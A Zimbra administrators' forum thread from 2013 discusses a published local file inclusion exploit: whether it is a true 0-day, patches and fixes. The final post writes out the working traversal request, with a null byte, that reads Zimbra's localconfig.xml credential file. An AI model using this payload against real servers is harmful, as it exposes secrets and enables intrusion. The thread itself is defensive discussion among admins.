zimbra 0-day

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
User avatar
maumar
Outstanding Member
Outstanding Member
Posts: 378
Joined: Fri Sep 12, 2014 10:28 pm

zimbra 0-day

Postby maumar » Sat Dec 07, 2013 10:47 am

It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry


phoenix
Ambassador
Ambassador
Posts: 26573
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Sat Dec 07, 2013 10:53 am

[quote user="maumar"]It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry[/QUOTE]Please file this in bugzilla.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
MKC
Posts: 26
Joined: Sat Sep 13, 2014 1:49 am

zimbra 0-day

Postby MKC » Sat Dec 07, 2013 5:29 pm

If anybody's interested, I've analyzed the bug and developed an independent fix for it.

I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me :)
User avatar
quanah
Zimbra Alumni
Zimbra Alumni
Posts: 1668
Joined: Fri Sep 12, 2014 10:33 pm
Contact:

zimbra 0-day

Postby quanah » Sat Dec 07, 2013 10:02 pm

Hi,
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah
--
Quanah Gibson-Mount
Product Architect, Symas http://www.symas.com/
OpenLDAP Core team http://www.openldap.org/project/
MKC
Posts: 26
Joined: Sat Sep 13, 2014 1:49 am

zimbra 0-day

Postby MKC » Sun Dec 08, 2013 10:14 am

The exploit was advertised as a 0day, and I took the author's word for it.

I feel silly now, sorry about this!
dik23
Outstanding Member
Outstanding Member
Posts: 264
Joined: Sat Sep 13, 2014 1:44 am

zimbra 0-day

Postby dik23 » Sun Dec 08, 2013 5:59 pm

Better a false alarm than no alarm
anndro
Posts: 2
Joined: Sat Sep 13, 2014 3:27 am

zimbra 0-day

Postby anndro » Mon Dec 09, 2013 1:30 pm

I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,
http://www.bilgiguvenligi.gov.tr/kritik-acikliklar/zimbra-e-posta-sunucusu-acil-aciklik.html
phoenix
Ambassador
Ambassador
Posts: 26573
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

zimbra 0-day

Postby phoenix » Tue Dec 10, 2013 1:17 am

[quote user="anndro"]I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,[/QUOTE]If you think this exploit still exists then file a report in bugzilla.
Regards

Bill

Rspamd: A high performance spamassassin replacement

Per ardua ad astra
dik23
Outstanding Member
Outstanding Member
Posts: 264
Joined: Sat Sep 13, 2014 1:44 am

zimbra 0-day

Postby dik23 » Tue Dec 10, 2013 4:19 am

Please could you post the big here so I can subscribe to it?
Thanks
expert_az
Posts: 29
Joined: Fri Sep 12, 2014 11:13 pm

zimbra 0-day

Postby expert_az » Tue Dec 10, 2013 4:23 am

I can confirm ,LFI working on last 8.0.5 and after 7.2.2
LFI is located at :

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 12 guests